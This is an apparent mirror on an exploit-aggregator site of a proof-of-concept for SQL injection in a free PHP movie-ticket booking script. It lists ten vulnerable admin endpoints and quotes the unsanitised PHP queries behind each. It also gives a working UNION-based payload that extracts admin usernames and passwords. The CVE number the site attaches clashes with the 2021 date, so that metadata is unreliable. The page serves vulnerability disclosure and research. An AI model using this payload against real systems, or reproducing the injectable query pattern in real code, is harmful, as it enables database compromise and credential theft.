Advertisement






Online Movie Ticket Booking - SQL injection

CVE Category Price Severity
CVE-2016-10693 CWE-89 $5000 High
Author Risk Exploitation Type Date
Unknown High Remote 2021-06-09
CPE
cpe:cpe:/a:online-movie-ticket-booking:sql-injection
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021060058

Below is a copy:

Online Movie Ticket Booking - SQL injection
# Exploit Title: Online Movie Ticket Booking  - SQL injection
# Date: 2021-06-04
# Exploit Author: Mostafa Farzaneh
# Vendor Homepage: https://github.com/vydyas
# Software Link: https://github.com/vydyas/Online-Movie-Ticket-Booking-Script-Free
# Tested on: Ubuntu 
# Version: 1.00



# This web application contains several SQL injection vulnerabilities in the following paths:
http://localhost//admin/agent-login.php?username=&password=
http://localhost/admin/get_ticket.php?ticketid=
http://localhost/admin/edit_theatre.php?id=
http://localhost/admin/get_movie.php?loc_id=
http://localhost/admin/get_agents.php?loc_id=
http://localhost/admin/get_movie_timings.php?movie_id=&loc_id=
http://localhost/admin/addmovies_process.php?movie_name=
http://localhost/admin/delete.php?id=
http://localhost/admin/get_customer_booking.php?clocation=&ctheatre=
http://localhost/admin/add_agent_process.php?theatre_name=

# PoC :

- Vulnerable code:

get_customer_booking.php:
$sql = "select * from assign_show where fk_location_id = '$clocation' and fk_theater_id = '$ctheatre'";
$clocation = $_REQUEST['clocation'];
$ctheatre = $_REQUEST['ctheatre'];

add_agent_process:
$query1 = mysql_query("SELECT * FROM agent WHERE username='$theatre_name' ");
$theatre_name = $_POST['theatre_name'];

delete.php:
$sql = "delete from location where id='$id'";
$id = $_GET['id'];

addmovies_process.php:
$query1 = mysql_query("SELECT * FROM movies WHERE name='$movie_name' ");
$movie_name = $_POST['movie_name'];

get_movie_timings:
$sql1 = "select * from theatres where movies_id = '$movie_id' and location_id='$loc_id'";
$movie_id = $_REQUEST['movie_id'];
$loc_id = $_REQUEST['loc_id'];

get_agents.php:
$sql = "SELECT * FROM agent where fk_location_id=$loc_id ";
$loc_id = $_REQUEST['loc_id'];

get_movie.php:
sql = "SELECT movies.name,movies.id,todate FROM assign_show join movies on assign_show.fk_movie_id = movies.id where assign_show.fk_location_id='$loc_id' order by movies.id desc";
$loc_id = $_REQUEST['loc_id'];

edit_theatre.php:
query = mysql_fetch_array(mysql_query("SELECT * FROM theatres WHERE id='$id'"));
$id = $_REQUEST['id'];

agent-login.php:
$query = mysql_query("select * from agent where username='$username' and password='$password'")
loginagent($username, $password)
loginagent($username, $password)

get_ticket:
$sql1 = "select customer_details.cust_id,customer_details.name,customer_details.email,customer_details.mobile from customer_booking join customer_details on customer_booking.fk_cust_id = customer_details.cust_id where fk_cust_id = '$ticket' group by fk_cust_id";
$ticketid = $_REQUEST['ticketid'];


- Payload:

http://localhost/get_movie_timings?movie_id='+union+select+1,group_concat(username,':',password) from admin-- -&loc_id=

********************************************************* 
#Discovered by: Mostafa Farzaneh
#Telegram: @pyweb_security
*********************************************************

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum